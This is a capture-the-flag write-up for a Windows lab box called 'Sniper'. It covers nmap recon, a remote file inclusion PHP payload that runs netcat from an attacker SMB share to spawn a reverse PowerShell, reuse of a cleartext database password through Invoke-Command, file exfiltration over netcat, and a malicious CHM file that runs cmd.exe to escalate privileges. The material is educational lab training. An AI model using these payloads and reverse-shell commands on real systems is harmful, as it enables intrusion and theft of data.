Sniper

Sniper is a medium difficulty windows box that has web based exploits
Recon
We start off scanning Snipers IP 10.10.10.151
with nmap
nmap -T4 -A -v 10.10.10.151
From Our Results we get the following services and ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Supported Methods: GET POST
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Sniper Co.
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Here we find port 80 is open, which means it must be hosting a website, upon navigating to 10.10.10.151:80
we find exactly that
for the most part we find nothing exceptionally interesting except.. a particular url http://10.10.10.151/blog/?lang=blog-en.php
the ?lang=
indicates that it may be vulnerable to RFI
attacks but we have no way of getting a shell? Let's take a look at our nmap scan again, it seems SMB is also open, we can usue this to access a SMB Share of ours.
apt-get install samba
mkdir -r /tmp/sniper/smb
chmod 777 /tmp/sniper/smb
For the sake of anonymous access we'll have to make some changes to our SMB Config, we can find it at /etc/samba/smb.conf
at the end of the file we'll have to add
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
Also due note that the smb
folder has the correct permissions
For these changes to take effect we'll have to restart the smb service we can do this with service smbd restart
Windows doesn't natively come with netcat
due to this we'll have to download it and host it ourselves we can get it from here https://eternallybored.org/misc/netcat/ and place it in our smb share folder
once we have this, we should start a local netcat
listener this can be done with
nc -lnvp 8888
ifconfig tun0 #get VPN IP
perfect we are ready to connect back to our machine from the target, now to trigger our RFI
vulnerability
<?php $answer = system('\\\\10.10.15.32\\pizza\\nc.exe 10.10.15.32 8888 -e powershell.exe');echo $answer."</br>"; ?>
http://10.10.10.151/blog/?lang=\\10.10.15.32\pizza\pizza.php
once our session is up and running we can go around looking for ways to escalate privileges to a user shell. Looking into C:/Users/
we find a user called Chris
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/9/2019 6:47 AM Administrator
d----- 4/11/2019 7:04 AM Chris
d-r--- 4/9/2019 6:47 AM Public
since we have a site up we should check its host directory which in this case is C:/inetpub/wwwroot
under this we find a directory called user and under it db.php
in this we find a db connection with a password in clear text that being 36mEAhz/B8xQ~2VM
we can safely assume that this is the user credentials.
<?php
// Enter your Host, username, password, database below.
// I left password empty because i do not set password on localhost.
$con = mysqli_connect("localhost","dbuser","36mEAhz/B8xQ~2VM","sniper");
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
Now we have user Creds, its time to login as user
Exploit
We can locally escalate user via the credentials we have and execute our payload to do this on powershell we'll
nc -lnvp 6464 #local listener
Huge thanks to @3r3bu5 for this tip
$user = "sniper\Chris" save a variable for chris as user
$password = ConvertTo-SecureString "36mEAhz/B8xQ~2VM" -AsPlainText -Force #convert the password to a plain-text string into password variable
$credential = New-Object System.Management.Automation.PSCredential ($user, $password) #create a PS credentials object of chris and the db password
Invoke-Command -ComputerName localhost -ScriptBlock { \\\\10.10.14.170\\pizza\\nc.exe 10.10.14.32 6464 -e powershell.exe } -Credential $credential #run nc from our smb share in context of Chris
Now that we have Chris we can get our first flag
cd ../Desktop
cat user.txt
Post Exploitation
Now that we have user we can dig around for root.
exploring C:/
reveals a directory called Docs
opening it gives us 2 files
Directory: C:\Docs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/11/2019 9:31 AM 285 note.txt
-a---- 4/11/2019 9:17 AM 552607 php for dummies-trial.pdf
getting the output of note.txt
shows us
Hi Chris,
Your php skillz suck. Contact yamitenshi so that he teaches you how to use it and after that fix the website as there are a lot of bugs on it. And I hope that you've prepared the documentation for our new app. Drop it here when you're done with it.
Regards,
Sniper CEO.
Yikes! looks like the CEO isn't to happy with us.
Let's continue Digging around. Checking the Downloads directory for Chris shows us a instructions.chm
looks interesting lets swipe it and have a look
we can use certutil
to encode the file in base64 and make it much easier to transfer for that we'll use
certutil -encode "instructions.chm" instructions.chm.txt
and to transfer it we'll use netcat yet again
nc -lp 1234 > instructions.chm.txt #on local
cat instructions.chm.txt | \\10.10.14.32\pizza\nc.exe -w 3 10.10.14.170 1234 #on target
now we can head over to windows to decode our instructions.chm
certutil -decode instructions.chm.txt instructions.chm

Yikes definetely a lot of bad blood here.
Fortunately it gives us a hint, going back to the CEO's note he noted that he was waiting for the documentation. Given Chris created this it stands to reason that the documentation was a .chm
Googling around we find that we can exploit chm!
Going back to windows we have to create CHM via html help workshop
Once we have the workshop setup we need to create a new project in it. Once we've done that we need to create a html file which will have our payload which is
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',cmd.exe, /c typeC:\Users\Administrator\Desktop\root.txt > C:/pizza/root.txt,'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
And edit the .hhp
to include our malicious html
[OPTIONS]
[FILES]
Untitled1.htm
and compile, once you have your chm
we can transfer it over to our victim. To do this we'll use SimpleHTTPServer
python -m SimpleHTTPServer 8088 #start server in the same directory as payload
Invoke-WebRequest http://10.10.14.32:8088/pizza.chm -OutFile C:/Temp/pizza.chm #Download Payload to machine
Great but now how do we get root? Well the CEO did also say to "drop it here" so lets copy our malicious chm
to C:\Docs
and hope for the best
cp pizza.chm C:\Docs\
And voila after a minute we should be having our root flag in C:/Temp
or a session if you wanted it to be so.
Useful Links
Last updated